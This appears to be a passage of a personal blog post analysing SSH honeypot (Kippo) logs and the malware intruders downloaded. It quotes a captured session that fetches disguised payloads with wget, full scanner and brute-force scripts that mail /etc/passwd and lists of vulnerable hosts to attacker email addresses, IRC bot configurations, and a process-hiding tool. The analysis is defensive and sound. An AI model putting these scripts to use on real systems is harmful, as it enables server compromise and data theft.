fast/r/rkicks.e
fast/r/rinsult.e
fast/r/raway.e
fast/mkindex
fast/Makefile
fast/m.set
fast/m.help
fast/LinkEvents
fast/go
fast/genuser
fast/configure
fast/checkmech
fast/bash
fast/3.user
fast/2.user
fast/1.user
fast/configure.c

server:/tmp/,# cd fast

server:/tmp/,/fast# ls -a
.           ..          src         r           mkindex     Makefile
m.set       m.help      LinkEvents  go          genuser     configure
checkmech   bash        3.user      2.user      1.user      configure.c

server:/tmp/,/fast# vi 1.user
E558: Terminal entry not found in terminfo

server:/tmp/,/fast# pico 1.user
bash: pico: command not found

server:/tmp/,/fast# apt-get  install pico
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  pico
0 upgraded, 1 newly installed, 0 to remove and 259 not upgraded.
Need to get 158.2kB of archives.
After this operation, 347.6kB of additional disk space will be used.
Get:1 http://ftp.debian.org stable/main pico 1.15-7 [158.2kB]
Fetched 158.2kB in 1s (4493B/s)
Reading package fields... Done
Reading package status... Done
(Reading database ... 177887 files and directories currently installed.)
Unpacking pico (from .../archives/pico_1.15-7_i386.deb) ...
Processing triggers for man-db ...
Setting up pico (1.15-7) ...

server:/tmp/,/fast# pico 1.user
pico: Segmentation fault

server:/tmp/,/fast# ./pico 1.user
bash: ./pico: command not found

server:/tmp/,/fast# wget pinky.clan.su/altele/pico.jpg
--2011-03-02 21:09:32--  http://pinky.clan.su/altele/pico.jpg
Connecting to pinky.clan.su:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84478 (82K) [image/jpeg]
Saving to: `pico.jpg

100%[======================================>] 84,478       27K/s  eta 1s

2011-03-02 21:09:34 (27 KB/s) - `pico.jpg' saved [84478/84478]
server:/tmp/,/fast# tar zxvf pico.jpg
pico

server:/tmp/,/fast# ./pico 1.user
Shall we play a game?
A strange game. The only winning move is not to play.  How about a nice game of chess?

server:/tmp/,/fast# ./pico 1.user
Shall we play a game? y
A strange game. The only winning move is not to play.  How about a nice game of chess?

server:/tmp/,/fast#

server:/tmp/,/fast# ls -a
.           ..          src         r           mkindex     Makefile
m.set       m.help      LinkEvents  go          genuser     configure
checkmech   bash        3.user      2.user      1.user      configure.c
pico.jpg    pico

server:/tmp/,/fast# apt-get install vi
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  vi
0 upgraded, 1 newly installed, 0 to remove and 259 not upgraded.
Need to get 442.2kB of archives.
After this operation, 972.4kB of additional disk space will be used.
Get:1 http://ftp.debian.org stable/main vi 0.12-1 [442.2kB]
Fetched 442.2kB in 1s (4493B/s)
Reading package fields... Done
Reading package status... Done
(Reading database ... 177887 files and directories currently installed.)
Unpacking vi (from .../archives/vi_0.12-1_i386.deb) ...
Processing triggers for man-db ...
Setting up vi (0.12-1) ...

server:/tmp/,/fast# vi 1.user
E558: Terminal entry not found in terminfo

server:/tmp/,/fast#

server:/tmp/,/fast# wget http://root-arhive.do.am/scanner/goshNEW.jpg  ; tar zxvf goshNEW.jpg ; cd goshNEW ; chmod +x *

server:/tmp/,/fast# cd ..

server:/tmp/,# ls -a
.        ..       fast.jpg fast

server:/tmp/,# wget http://root-arhive.do.am/scanner/goshNEW.jpg  ; tar zxvf goshNEW.jpg ; cd goshNEW ; chmod +x *
--2011-03-02 21:11:59--  http://root-arhive.do.am/scanner/goshNEW.jpg
Connecting to root-arhive.do.am:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3144067 (2M) [image/jpeg]
Saving to: `goshNEW.jpg

100%[======================================>] 3,144,067    759K/s  eta 0s

2011-03-02 21:12:03 (759 KB/s) - `goshNEW.jpg' saved [3144067/3144067]

goshNEW
goshNEW/a
goshNEW/userrootmic.txt
goshNEW/gen-pass.h
goshNEW/mass
goshNEW/2
goshNEW/ss
goshNEW/pscan2
goshNEW/secure
goshNEW/ssh-scan
goshNEW/sortateusr.txt
goshNEW/CITESTE-INAINTE-SA-INCEPI
goshNEW/vuln.txt
goshNEW/common
goshNEW/1
goshNEW/gen-pass.sh
goshNEW/go.shB
goshNEW/pass_file
goshNEW/5
goshNEW/userroomare.txt
goshNEW/3
goshNEW/mfu.txt
goshNEW/4
goshNEW/screen
goshNEW/go.shA

server:/tmp/,/goshNEW# screen
bash: screen: command not found

server:/tmp/,/goshNEW# ./screen
Shall we play a game?
A strange game. The only winning move is not to play.  How about a nice game of chess?

server:/tmp/,/goshNEW#

server:/tmp/,/goshNEW# apt-get install screen
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  screen
0 upgraded, 1 newly installed, 0 to remove and 259 not upgraded.
Need to get 774.2kB of archives.
After this operation, 1702.8kB of additional disk space will be used.
Get:1 http://ftp.debian.org stable/main tmpgoshNEWscreen 0.19-7 [774.2kB]
Fetched 774.2kB in 1s (4493B/s)
Reading package fields... Done
Reading package status... Done
(Reading database ... 177887 files and directories currently installed.)
Unpacking tmpgoshNEWscreen (from .../archives/tmpgoshNEWscreen_0.19-7_i386.deb) ...
Processing triggers for man-db ...
Setting up tmpgoshNEWscreen (0.19-7) ...
server:/tmp/,/goshNEW# screen

Malware analysis

Kippo also provides another handy function: it stores any downloaded files. This allows us to further analyze some of the malware used by the intruders.

File http___fiunic_eu_pub.tgz

An archive containing what looks like source code for an SSH server.

File http___pinky_clan_su_mech_fast.tgz

This archive contains an IRC bot. configure.c shows:

#############CONF##############
my $hidden = '/usr/sbin/apache/log';
my $linas_max='4';
my $sleep='5';
my @admins=("Senil","Dereglat");
my @hostauth=("Senil.users.quakenet.org","Dereglat.users.quakenet.org");
my @channels=("#anyone312");
my $nick='bombon';
my $ircname ='furt';
my $realname = 'pe fatza';
my $server='multiplay.uk.quakenet.org';
my $port='6667';
##############################

Joining the channel on Quakenet reveals nothing.

The archive also contains an executable called bash. This is a compiled EnergyMech IRC bot. The source code is also included in the archive, together with configuration:

SERVER diemen.nl.eu.undernet.org 6667
SERVER London2.UK.EU.Undernet.Org 6667
SERVER 62.231.74.10 6667
SERVER lelystad.nl.eu.undernet.org 6667
SERVER mesa.az.us.undernet.org 6667
SERVER Zagreb.Hr.EU.UnderNet.org 6667
SERVER Helsinki.FI.EU.Undernet.org 6667
SERVER Carouge.CH.EU.Undernet.org 6667
SERVER us.undernet.org 6667
SERVER oslo2.no.eu.undernet.org 6667
ENTITY x

###BOT 1###
NICK Red-hack1
USERFILE 1.user
CMDCHAR .
LOGIN rosu
IRCNAME  4®  12Welcome  3in  14My  4World 13!!!  7®
MODES +ix-ws
HASONOTICE
TOG CC          1
TOG CLOAK       1
TOG SPY         1
SET OPMODES     6
SET BANMODES    6
CHANNEL         #canalul-tau
TOG PUB         1
TOG MASS        1
TOG SHIT        1
TOG PROT        1
TOG ENFM        0
SET MKL         7
SET MBL         7
SET MPL         1

Also here, joining the channel does nothing.

The archive also contains a shell script, used to check if the bot is still running and to restart it:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
#! /bin/sh
RUN=./bash
OPT=
OUTPUT=./mech.cron
if [ -r mech.pid ]; then
  PID=`cat mech.pid`
  if [ -r /proc/$PID ]; then
    exit 0
  fi
  if ( kill -0 $PID 1> /dev/null 2> /dev/null ); then
    exit 0
  fi
fi
echo >> $OUTPUT
echo "Mech restarted:" >> $OUTPUT
( date 2>&1 ) >> $OUTPUT
echo >> $OUTPUT
( $RUN $OPT 2>&1 ) >> $OUTPUT95

Shell scripts like these are often put in crontabs.

File http___arhiva_do_am_scan.tar

This archive contains the often repacked pscan and ssh-scan tools. A shell script called start contains:

#/bin/bash
# start.sh script
# part of ssh massrooter by pulea
# /j #r.o.o.t pt intrebari :)

if [ $# != 1 ]; then
        echo "[+] pulea zice :"
sleep 3
        echo "[+] sa-mi bag pula in creierii tai !"
        echo "[+] ex. : $0 <b class>"
        exit;
fi

clear
cat a1
if [ -f a4 ]; then
echo "[+] Checking files.."
sleep 3
echo " OK"
perl sshc.c

./a $1.0
./a $1.1
./a $1.2
./a $1.3
./a $1.4
./a $1.5
./a $1.6
./a $1.7
./a $1.8
./a $1.9
./a $1.10
./a $1.11
./a $1.12
./a $1.13
./a $1.14
./a $1.15
./a $1.16
./a $1.17
./a $1.18
./a $1.19
./a $1.20

cat vuln.txt |mail -s "vuln.txt" luchian8@gmail.com

#SNIP

rm -rf sshc.c
killall -9 a
killall -9 a
killall -9 pscan2
if [ "$(whoami)" != "root" ]; then
./sshf
else
./sshf0
fi
clear
echo "[+] momentul adevarului :)"
echo "[+] ne odihnim cateva secunde .."
sleep 5
echo ""
cat vuln.txt
cat vuln.txt >> .vulnold.txt
echo > vuln.txt
cat a6 >> vuln.txt
else
echo "[+] Checking files.."
sleep 3
echo " error"
echo "[+] Some file are missing"
echo "[+] Please reinistall it from your wget"
echo "[+] or ask pulea !"

I wonder who this luchian8@gmail.com is… Anyway, a is another shell script running:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
#!/bin/bash

./pscan2 $1 22
sleep 5
cat $1.pscan.22 |sort |uniq > mfu.txt
oopsnr2=`grep -c . mfu.txt`
echo ""
echo "[+] Attacking $oopsnr2 servers!"
echo ""
perl sshc.c
rm -rf sshc.c
./pass_sh
./ssh-scan 100
rm -rf $1.pscan.22 mfu.txt
echo ""

pscan is a basic port scanner for an IP block. ssh-scan is a password brute forcer. Other files just contain some dubious ascii art:

 __^__                                                              __^__
( ___ )------------------------------------------------------------( ___ )
 | / |               #help-bnc present`s:                           | \ |
 | / |       OmAr'z ssh massrooter build on 11-01-2006              | \ |
 | / |                                                              | \ |
 | / |                  Thanks to :  OmAr                           | \ |
 | / |                 and to all #OmAr members.                    | \ |
 | / |                                                              | \ |
 | / |    Fucks goes to : all hackers, we are script kiddies..      | \ |
 | / |                    so what ? fuck off !                      | \ |
 | / |                                                              | \ |
 | / |                      EOF by OmAr                             | \ |
 | / |--------------------------------------------------------------| \ |
 |___|______________[OmAr'z ssh massrooter by OmAr]_________________|___|
(_____)------------------------------------------------------------(_____)
   ^                                                                  ^

File http___gblteam_webs_com_gosh.tgz.tar

Another repackaging of the pscan-ssh-scan combination. This one contains a script called secure:

1
2
3
4
5
6
7
8
#!/bin/bash
if [ `whoami` == "root" ]; then
chmod -x /usr/bin/mail
mv /usr/bin/mail /usr/bin/s8
echo " Done , You can scan now "
else
echo -e " you're not root you're `whoami` with id `id` !! "
fi

… because disabling mail totally hides your tracks, yo.

The script scam contains a variation of the script seen above:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#!/bin/bash
echo "[+] [+] [+] RK [+] [+] [+]" >> info2
echo "[+] [+] [+] IP [+] [+] [+]" >> info2
/sbin/ifconfig -a >> info2
echo "[+] [+] [+] uptime [+] [+] [+]" >> info2
uptime >> info2
echo "[+] [+] [+] uname -a [+] [+] [+]" >> info2
uname -a >> info2
echo "[+] [+] [+] /etc/issue [+] [+] [+]" >> info2
cat /etc/issue >> info2
echo "[+] [+] [+] passwd [+] [+] [+]" >> info2
cat /etc/passwd >> info2
echo "[+] [+] [+] id [+] [+] [+]" >> info2
id >> info2
echo "[+] [+] [+] Spatiu Hdd / pwd [+] [+] [+]" >> info2
df -h >> info2
pwd >> info2
cat info2 | mail -s "Scanner MaLa Port : ?? | Pass : stii tu :))" mafia89tm@yahoo.com
rm -rf info2
clear

echo "####################################################################"
echo "#                          ______                                  "
echo "#                        .-.      .-.                               "
echo "#                       /            \                              "
echo "#                      |     zRR      |                             "
echo "#                      |,  .-.  .-.  ,|                             "
echo "#                      | )(z_/  \z_)( |                             "
echo "#                      |/     /\     \|                             "
echo "#              _       (_     ^^     _)                             "
echo "#      _\ ____) \_______\__|IIIIII|__/_________________________     "
echo "#     (_)[___]{}<________|-\IIIIII/-|__zRR__zRR__zRR___________\    "
echo "#       /     )_/        \          /                               "
echo "#                         \ ______ /                              "
echo "#                         SCANER PRIVAT                             "
echo "#             SCANER FOLOSIT DOAR DE TEAMUL MaLaSorTe               "
echo "#            SACNERUL CONTINE UN PASS_FLIE DE 3MEGA !!              "
echo "####################################################################"

if [ -f a ]; then
cat vuln.txt |mail -s "Lame Gang Us Roots" mafia89tm@yahoo.com
./a $1.0
./a $1.1
./a $1.2
./a $1.3
./a $1.4
./a $1.5
./a $1.6
./a $1.7
./a $1.8
./a $1.9
./a $1.10
cat vuln.txt |mail -s "Lame Gang Us Roots" mafia89tm@yahoo.com

# SNIP
killall -9 a
else
echo # Ciudat ..Nu Ai Urmat Instructiunile  #
echo # trebui dat mv assh a sau mv scan a   #
echo # orice ai avea tu ... dohh ..         #
killall -9 a
killall -9 pscan2
fi

… because writing a for-loop is too hard. I wonder who mafia89tm@yahoo.com is. Also, if you disable mail, how does mail work, exactly?

File: http___no_biju_com_merge_Arhive_devilflood.tar.gz

A package containing executables, probably used to DoS servers. TCP, UDP, IRC and SMTP flooders are present. There is a list of IP addresses in a txt file, probably targets.

There are also a few configuration files with Undernet IRC channels, but joining them reveals no users.

File http___www_freewebs_com_iulianshooter_psyBNC2_3_2_4.tgz.tar.gz

This is PsyBNC:

psyBNC is an easy-to-use, multi-user, permanent IRC-Bouncer with many features. Some of its features include symmetric ciphering of talk and connections (Blowfish and IDEA), the possibility of linking multiple bouncers to an internal network including a shared partyline, vhost- and relay support to connected bouncers and an extensive online help system. Many other helpful functions are included. It compiles on Linux, FreeBSD, SunOs and Solaris.

File http___eu_ro_ca_img.tar

Another package containing pscan. There’s also an IRC bot present:

echo "SERVER 82.196.213.250 6666" >> m.set
echo "SERVER 208.83.20.130 6667" >> m.set
echo "SERVER 195.197.175.21 6669" >> m.set

echo "ENTITY $2" >> m.set

echo "### BOT 1 ###" >> m.set
echo "NICK ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "USERFILE $2.user" >> m.set
echo "CMDCHAR ." >> m.set
echo "LOGIN ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "IRCNAME ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "MODES +iwsx" >> m.set
echo "HASONOTICE" >> m.set
echo "VIRTUAL $2" >> m.set
echo "TOG CC          1" >> m.set
echo "TOG CLOAK       1" >> m.set
echo "TOG SPY         1" >> m.set
echo "SET OPMODES     6" >> m.set
echo "SET BANMODES    6" >> m.set
echo "CHANNEL         #$1 " >> m.set
echo "TOG PUB         1" >> m.set
echo "TOG MASS        1" >> m.set
echo "TOG SHIT        1" >> m.set
echo "TOG PROT        1" >> m.set
echo "TOG ENFM        0" >> m.set
echo "SET MKL         7" >> m.set
echo "SET MBL         7" >> m.set
echo "SET MPL         1" >> m.set

Looking at the intercepted logs (see above) reveals the used channels. Joining this channel leads you to an active community of rooters selling shells on hacked servers.

File http___freewebtown_com_pacalici_lib.tgz

Again an IRC bot, together with a shell script checking if the bot is running called y2kupdate (nice try). There’s also source code for a hider program:

/*

psf -- Process Stack Faker (a.k.a. Fucker)

Coded by Stas; (C)opyLeft by SysD Destructive Labs, 1997-2003

Tested on: FreeBSD 4.3, Linux 2.4, NetBSD 1.5, Solaris 2.7

Compile with:

# gcc -O2 -o h h.c
# strip h

Did you ever need to *hide* what are you doing on somewhat like public
server? Like Quake server or maybe John The Ripper? 'Cos when your admin
run "ps auwx" or "top" and sees process like that, it's probable you'll
loose your shell on that server. So, what to do? Rootkit is a good solution
but you need root privilegies to install it and it's a bit overkill for
running an inoffensive eggdrop bot (belive me, I saw user installing rootkit
just to hide eggdrop!). Well, this little proggie does a job for you. It
*will not* erase some entry you wish to hide from process stack. It just
changes a commandline for "ps" entry ;)
This principle is widely used in many security-related programs. Nmap was
the first I saw. How does this technique works? Take a look at execv(3)
system call:

int execv( const char *path, char *const argv[]);

'path' is a path to executable file. And 'argv' array is... Well, it's
just the same 'argv' from:

int main(int argc, char *argv[])

where 'argv[0]' is a commandline and 'argv[1]' and higher are paramenters.
Normally 'argv[0]' receives the same value as 'path' from execv(3). But you
also can use other values! For example, when you run Nmap, it can execv(3)
itself with commandline changed to 'pine'. OK, commandline is gone. But what
to do with paramenters? Nmap uses environment to send paramenters user passed
to 'spoofed' process and ignores other paramenters. If you wish to spoof
'nmap -sS -vv -O -P0 -o lhost.log localhost' as 'pine -i', Nmap "remembers"
it's specific switches and re-execs itself as 'pine' with parameter '-i'.
Fine! But John The Ripper, Quake server & eggdrop can't fake parameters in
this way!!! What's the other way? Sorry, it's *very* dumb and *very* ugly...
What happens if you change commandline to something like:
'pine -i                                            '

(Ya, 'pine -i' plus many space characters 0x20)? Hahah, "ps", "top" & many
other monitors just shift away *real* parameters! So, you don't hide them,
just shift away from screen. Such a "algorithm" doesn't needs neither rootkits,
neither special privilegies! Any user can do that at any time!!! *That's* "psf"
does. Try this:

# psf -s "pine -i" sleep 30 &
[1] 440

# ps auwx
...
stas        84  0.0  0.6  2012 1232 pts/0    S    19:12   0:00 bash -rcfile .bashrc
stas       440  0.0  0.1  1204  376 tty2     S    20:09   0:00 pine -i
stas       450  0.0  0.4  2544  816 tty2     R    20:12   0:00 ps auwx
...

Hahahaah, that's what we need! Please note that commandline change isn't
immediate, just wait a little before it completes. But... Did you noticed
a white line between processes 440 & 450? Uhm, that's our "shift buffer".
Pray for your admin don't notice that! Anyway, they are many more problems
with parameter shifting. "top" program, for example, shows "command names"
instead of "command lines" by default. You see a file name instead of
'argv[0]' value. "psf" tries to fix that creating symlink with name of
faked commandline to real program (on previous example, it creates symlink
/tmp/.psf-xxxx/pine => /usr/bin/sleep). Note that it doesn't works on *BSD
systems (*BSD kernel (?) follows symlink and shows real filename anyway).
The ways to discover faked processes I know are:

 * kidding with top(1)
 * ps auwx --cols 1024
 * cat /proc/[pidn]/cmdline (Linux only)
 * whatever non-standart process stack monitors
 * looking open files with "lsof" program
 * if you use -d (daemonize) option, be careful!!! As any cool daemon should
   do, "psf" closes std(in,out,err). What your admin will think if he (she)
   sees "pine -i" with no parent and neither allocated TTY?!

Too many, don't you think? So, what's *THE BEST* way to hide processes?
Rootkit sounds well, but it's a bit complex to use, you know... So, IMHO,
you must get source of program you wish to hide and hardcode all parameters
inside executable... After that, rename it in whatever and let it go!
Of course you must program at least C/C++ to do such a trick. Now, if
you're glad with my quick & dirty solution called "psf", happy faking!!!
*/

Deviously simple. Adding spaces. There’s also a configuration file present leading to a lonely IRC server:

NICK          Sex
USERFILE      1
CMDCHAR       !
LOGIN          tun
IRCNAME       Nelu
MODES         +ix-ws
TOG CC        0
TOG CLOAK     1
TOG SPY       1
SET OPMODES   4
SET BANMODES  6
SET AAWAY     1
TOG NOIDLE    1

CHANNEL       #brasov
TOG PUB       1
TOG MASS      1
TOG SHIT      1
TOG PROT      1
TOG ENFM      1
SET ENFM      +nt
SET MDL       4
SET MKL       4
SET MBL       4
SET MPL       1


SERVER 200.41.53.1 6667
SERVER chmod.myftp.biz 6667

Joining the channel also reveals a small hacker community using EnergyMechs on hacked servers to DoS Russion web hosts.

File http___ema_ucoz_com_ICE_UNIX.tgz

Again a IRC bot leading to an obscure channel on Undernet. I have not repeated the config here.

Archive containing .sshd

A more unique malware script this time. Containing the shv5-rootkit rootkit, which is, according to the file, “very private”, but dates back to 2007, so it’s probably an old version. The tools first checks for Tripwire, Snort, and other tools. It then continues to install itself into various directories. And starts to install backdoors into various programs (ls, top, …). It then checks for some basic vulnerable daemons, and warns that you should patch them (oh the irony). It finally also checks for other rootkits (tk7, tk8, beX2, tuxkit, optickit) and tries to remove those. It then tries to cover its tracks by clearing log files.

The other files also mostly contained bots pointing to Undernet IRC channels. Some or quite active and contain around 100 bots, others are empty. Joining some of them gets you an immediate ban.

Country statistics

I grepped through hundreds of lines of logging from Kippo, removed duplicate IP addresses, and used GeoIP to do a country lookup. Here are the sorted results:

CN, China                51
US, United States        42
RO, Romania              26
CA, Canada               12
IN, India                11
KR, Korea, Republic of   10
RU, Russian Federation   10
BR, Brazil                8
DE, Germany               8
GB, United Kingdom        8
TH, Thailand              8
IT, Italy                 7
HK, Hong Kong             6
JP, Japan                 5
TR, Turkey                5
AT, Austria               4
TW, Taiwan                4
BE, Belgium               3
CO, Colombia              3
ES, Spain                 3
FR, France                3
NL, Netherlands           3
SE, Sweden                3
CZ, Czech Republic        2
EG, Egypt                 2
ID, Indonesia             2
MD, Moldova, Republic of  2
NO, Norway                2
PL, Poland                2
VN, Vietnam               2
AE, United Arab Emirates  1
AR, Argentina             1
BG, Bulgaria              1
BH, Bahrain               1
CH, Switzerland           1
CL, Chile                 1
CR, Costa Rica            1
GE, Georgia               1
GT, Guatemala             1
HU, Hungary               1
IS, Iceland               1
KE, Kenya                 1
KZ, Kazakhstan            1
LB, Lebanon               1
LT, Lithuania             1
MN, Mongolia              1
MX, Mexico                1
MZ, Mozambique            1
PA, Panama                1
PE, Peru                  1
PH, Philippines           1
SG, Singapore             1
VE, Venezuela             1

Be wary when interpreting these results, as they might represent “countries containing hacked servers” more than “originating countries of hackers”, as hacked servers are, as we’ve seen, often used to get to other targets.

Concluding remarks

Kippo has now been removed from my server, due to the fact that I don’t have enough time to keep checking up on it and I feel a bit uneasy running a honeypot on server containing important data. As I’ve said before, modifying and extending Kippo and analysing the results using a few VPS hosts might be a fun summer project.

The main lesson to take away from this post is this: keep your servers secure. This means running upgrades, but especially choosing strong passwords (or using RSA keys). As we’ve seen, most malware contained brute forcing tools, trying one server after another.

While analyzing cute honeypot logs is by no means doing what one would call “advanced security research”, I did have a lot of fun with it, especially when trying to investigate IRC channels and trailing the hackers.

Some time ago (actually: years and years ago), I myself was (indirectly) involved with a botnet, containing not hundred but thousands of bots, which is a story for another time. I understand the thrill of gaining your first rooted shell, but being on the opposite side of things (that is: running a server instead of hacking one) also shows how script kiddies operate without any regard for privacy, property or data. It is a valuable, but sad lesson.